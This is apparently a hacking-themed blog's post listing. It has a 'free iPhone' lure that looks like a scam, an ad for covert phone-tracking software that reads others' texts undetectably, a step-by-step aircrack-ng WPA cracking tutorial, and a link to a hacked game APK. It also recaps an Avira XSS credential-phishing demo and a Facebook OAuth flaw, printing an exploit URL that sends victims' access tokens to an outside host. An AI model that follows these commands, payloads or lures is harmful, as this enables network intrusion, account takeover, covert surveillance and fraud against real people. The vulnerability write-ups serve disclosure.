Recent Posts

Monday, April 17, 2017

Win a free iPhone 7 and iPhone 7plus.





Note: only for the people who live in united States Hello everyone i have found a method to get free iPhone 7 and iPhone 7plus.. After ypu add your info from the link below pleas pm me from our official Facebook page.. We will guide you how to own you brand new free iPhone 7 or iPhone 7plus.. Hurry this trick will last for just first 100 users who getting in.. We know how to add your email to the selected list.. This a good opportunity to show our power REMEMBER ONLY USA PLEOPLE CAN JOIN.. So if you are outside from usa dont worry share this post to your friends who are living in united States..

  Click here to get your free iPhone 7 or iPhone 7plus


 

Accurately locate and track any phone or tablet anywhere in the world!

Accurately locate and track any phone or tablet anywhere in the world! Track your children's devices and location history, or create virtual barriers to be alerted when they cross the set barrier. Never worry where your kids are again! 

Every parent would only like the best protection and ensured safety of their children. With the many advances in modern technology like we have today, this has become even easier to do. Now, parents can locate their children wherever they are. Parents can do this by tracking their children's mobile phones. Not only that, but parents can now track many other activities by using mobile tracking software.

There are many websites on the internet that can offer you this service. The cell phone is the most wanted gadget for children, teens and young adults in the world today. This is just another one of many ways that they can stay connected with their friends, play games, surf the web, chat, send text messages, email etc.. While it's important for them to stay connected, parents want a tool that provides peace of mind, safety and security when it comes to their children's new found freedom and responsibility. The natural choice for that would be a mobile tracking software.

There are some cell phone service providers that you as parents can choose that will allow you to either use or not use the GPS tracking feature in order to track the whereabouts of your children.Of course parents have the ability to call their children to ask about their location. You as a parent have had this ability for a long time. However, GPS tracking goes one step further. It will let working moms and dads find out the exact location of their children if they suspect them of not being where they're supposed too. They know the location of the child when they are in school or on the soccer field or even at the mall.

There are also a number of mobile tracking software that take tracking to another level. Your children treat their mobile phone as if it was their best friend. With the use of a more advanced mobile tracking service, the mobile phone will become your best friend. You can now know and review all the activities on your childs mobile phone. Know whether they are being bullied or accessing unacceptable content on the internet. You can also keep track of who calls your child and who your child is calling. It also allows parents to see who their child may be texting, with the added ability of being able to read those text messages word for word, even if they've deleted them..

Since the invention of mobile phone tracking, there are a lot of people who are concerned about whether or not you're violating the privacy of the individual being tracked. But, this is purely a judgement call on your own part.. There are many instances when this type of software is needed and extremely valuable to uncover information that can impact you directly and help prevent or uncover hidden dangers. Many major corporations have used this service or software as a method to track the activities of their employees. The advantages of cell phone tracking far surpass any privacy concerns that it puts forward. This service can be highly beneficial to parents. Allowing them to keep a tight watch on their children at an age filled with peer pressure, vulnerability to internet predators and poor decision making.

One of the easiest ways to track cell phone activity is with mobile tracking software. And with it's easy installation, you can track all you want while the software remains undetectable.

To learn more about how you can do your own detective work using mobile tracking software that can track gps location, monitor and review incoming/outgoing calls, logs of current/deleted text messages word-for-word, chat, and internet activity Click Here


Users can use the coupon code 'GET25' for 25% off every month. Wording to use: 25% off with code 'GET25'.


Thursday, December 19, 2013

Cracking Wireless (WPA)


 


This chapter will teach you how to crack the WPA of a wireless network using BackTrack 4 step by step. BackTrack is a free OS available for download at http://www.backtrack-linux.org/downloads/. This tutorial is using BackTrack 4, but it should work similar in newer versions. Backtrack is the ultimate security testing OS, and is preloaded with hundreds of tools you can use to hack. We're only going to be using a couple for this tutorial. Cracking WPA isn't 100% going to work everytime. It depends on how easy their WPA password is, and how good your dictionary file is.
What you will need:
  1. Download the BackTrack 4 flavor of your choice. You can either boot the OS using VMware within windows, or you can boot backtrack straight off of a DVD or flash drive. Instructions for each of these methods are on the backtrack website.
  2. Once you have booted up backtrack, it will ask you for a username and password. username: root password: toor
  3. Now type startx and press enter. This will log you into backtrack and you should now see the desktop.
  4. Open a command terminal. You can do this by clicking the black box icon bottom left corner of the screen.
  5. type in: airmon-ng
  6. Look for the name of your wireless card, its different for a lot of computers, mine is wlan0, so for the rest of this guide thats what i'm going to use. Replace wlan0 in all the following steps with whatever your device name is.
  7. type: airmon-ng stop wlan0
  8. type: macchanger --mac 00:11:22:33:44:55 wlan0
  9. type: airmon-ng start wlan0
  10. type: airodump-ng wlan0
  11. You will now see all of the wifi networks in range. once you found the one you want to hack, press Ctrl + C to stop scanning. Take note of the bssid and channel of the network you want to hack.
  12. type: airodump-ng -c (put the channel # here) -w wpahack --bssid (enter bssid here) wlan0
  13. Keep that window open, now open another command terminal and enter the following in the newly opened terminal:
  14. type: aireplay-ng -0 5 -a (enter bssid here) wlan0
  15. type: aircrack-ng wpahack.cap -w (path to a dictionary file)
  16. You should now see it attempting to crack the WPA key. This could take awhile depending on how big the dictionary file is, and how fast your computer is. When its found the key, it will appear on the screen. You can now log into that network using the WPA on the screen :)
NOTES:
This won't work if you dont get a WPA handshake. The command terminal will let you know if you've received the WPA handshake or not.
Hacking WPA isn't 100% going to work every time. It will only work if their WPA password is in the dictionary file you're using. The bigger the dictionary file, the better your chances, the longer it will take.
It is illegal to steal wireless internet. Only try this on your own network. This guide is for educational purposes only, as with everything in this ebook. Use at your own risk.

Tuesday, November 19, 2013

Subway Surfers new Orleans v1.15.0. With unlimited coins and key

 

Hello Guys today we come with a most popular game in android market. This  latest version of Subway Surfers new Orleans v1.15.0. With many benefits. 

Our hack version benefits .
  • Unlimited conies
  • Unlimited keys
  • With Facebook share
Feature of Subway Surfers new Orleans v1.15.0
  • DASH as fast as you can!
  • DODGE the oncoming trains!
  • Help Jake, Tricky & Fresh escape from the grumpy Inspector and his dog.
  • ? Grind trains with your cool crew!
  • ? Colorful and vivid HD graphics!
  • ? Hoverboard Surfing!
  • ? Paint powered jetpack!
  • ? Lightning fast swipe acrobatics!
  • ? Challenge and help your friends!
  • Join the most daring chase!
  • A Universal App with HD optimized graphics.
  • By Kiloo Games and Sybo Games
What's New
? Celebrate Halloween with the Subway Surfers in New Orleans
? Explore the spooktacular Subway
? Prepare King and Frank for Trick-or-Treating with a sweet Halloween Outfits
? Collect the pumpkins on the tracks to get cool Weekly Hunt prizes.
Download Subway Surfers new Orleans v1.15.0. With unlimited coins and key

or

Sunday, May 19, 2013

Minor flaw allows Hacker to hijack Avira Antivirus customers accounts





Cross site scripting vulnerabilities are mistakenly considered unimportant, but they could allow attackers to inject client-side script in web pages visited by victims.

A cross-site scripting (xss) vulnerability may be exploited by hackers to bypass access controls going beyond the exceptions.
An Egyptian information security advisor Ebrahim Hegazy (Zigoo) has found an XSS vulnerability in the Avira license daemon. license.avira.com
But instead of exploiting it in a normal way "alert('MyName')" stuff and then reporting, He decided to demonstrate it to Avira security team in a different mode with the purposes to show how could an XSS vulnerability allows the hackers to steal user accounts with a clear text data!
To demonstrate this attack he has created 4 files:

avira.html - the fake login page
log.php - the logger which will log the credentials as clear text into txt file
avira.txt - credentials will be found here
done.html - will show a congratulation message to fool the users


According to Ebrahim Hegazy, Avira team responded promptly and fixed the flaw in short time. For those who consider XSS vulnerability as low severity vulnerability, now you can change your opinion.

Credits: Ebrahim Hegazy is an information security advisor @Starware Group, acknowledged by Google, Microsoft and Ebay for finding and reporting multiple vulnerabilities in their applications.

Wednesday, May 15, 2013

Real facebook hacking 2013

Facebook OAuth is used to communicate between Applications & Facebook users, to grant additional permissions to your favorite apps. To make this possible, users have to 'allow or accept' the application request so that app can access your account information with required permissions.

As a normal Facebook user we always think that it is better than entering your Facebook credentials, we can just allow specific permissions to an app in order to make it work with your account.

Today whitehat Hacker 'Nir Goldshlager' reported 'The Hacker News' that he discovered a very critical vulnerability in Facebook's OAuth system, that allowed him to get full control over any Facebook account easily even without 'allow or accept' options.


For this purpose he hunt the flaw in a very mannered way i.e
Step 1) Understanding the OAuth URL
Step 2) Finding a way to use custom parameters in URL
Step 3) Bypassing OAuth 'Allow' button request at user end

1.) Understanding the OAuth URL
The Facebook OAuth dialog URL is something like shown below:

https://www.facebook.com/dialog/oauth/?app_id=YOUR_APP_ID&next=YOUR_REDIRECT_URL&state=YOUR_STATE_VALUE&scope=COMMA_SEPARATED_LIST_OF_PERMISSION_NAMES

zyngaallowdomain












Where app_id is the application ID and next parameter must contains the URL of the respective app domain only. For example app_id=2389801228 belongs to 'Texas Holdem Poker' app, So the 'next' parameter will allow only zynga.com domain (i.e next=http://zynga.com), otherwise Facebook will block that action.

2.) Finding a way to use custom parameters in URL
Goldshlager found that Facebook was allowing him to use facebook's sub domain in next parameter in the URL ie. https://beta.facebook.com/#xxx!/messages/. But '#xxx!' was not working for all browsers. After fuzzing the URL characters, he found that %23~! and %23%09! worked for all browsers.

This finding was enough to redirect user to any file or folder at Facebook domain.
Then he developed a simple Facebook application (i.e touch.facebook.com/apps/testestestte) ,which  was just to redirecting users to remote site (i.e. files.nirgoldshlager.com) with access token, where a log file was ready to store all access tokens.

3.) Bypassing OAuth 'Allow' button request at user end
Till now attacker was able to redirect user to a fake app, which was passing victim's access tokens to a 3rd party domain where attacker was logging access tokens. But the main issue was still there i.e without user interaction, app will not work. That means, one have to click 'allow' button as shown below.
allowthisaction












So, to bypass this, he discovered that there are many built-in Facebook applications i.e 'Facebook Messenger app' that can access full permissions (read inbox, outbox, manage pages, manage ads,access to private photos, videos, etc.) from the victim's account without
user interaction i.e no need to click 'allow' button.

i.e Sample Final URL :

https://www.facebook.com/connect/uiserver.php?app_id=220764691281998&next=https%3A%2F%2Ftouch.facebook.com%2F%23~!%2Fapps%2Ftestestestte%2F&display=page&fbconnect=1&method=permissions.request&response_type=token
This way attacker is now able to grab access tokens (with full permissions) of any Facebook account by just making his victims to visit a modified OAuth URL (without user interaction). This access_token will be never expired, It will expired only after the victim change his Facebook password
As a responsible bug hunter, Nir Goldshlager reported this flaw to Facebook security team few months back and now it is fixed. He was rewarded many times in bug bounty program. In January he also reported a password reset vulnerability in Facebook Employees Secure Files Transfer service


Note: This tutorial is only for Educational Purposes, I did not take any responsibility of any misuse, you will be solely responsible for any misuse that you do. Hacking email accounts is criminal activity and is punishable under cyber crime and you may get upto 40 years of imprisonment, if got caught in doing so.

Thursday, April 25, 2013

make money online with your graphic designing skills

                                                      


 
 
 
 
 
usingdesigncrowd for Graphic Designers is simple and easy, Goto website and Post your design Project and . Specify your budget, and add some other instructions about it.
  • Dollars will be payable to all the designers so designers can get more profit rather than Indian ruppee for their work.
  • many online logo design contests held everyday . so if you are a designer you have a chance to earn upto 400$ for each Contest.
  • DesignCrowd support Best payment gateway so there might nt be any truble in accepting payments for Contestent or Designer.
  •  
  • 250-x-250.png (250×250)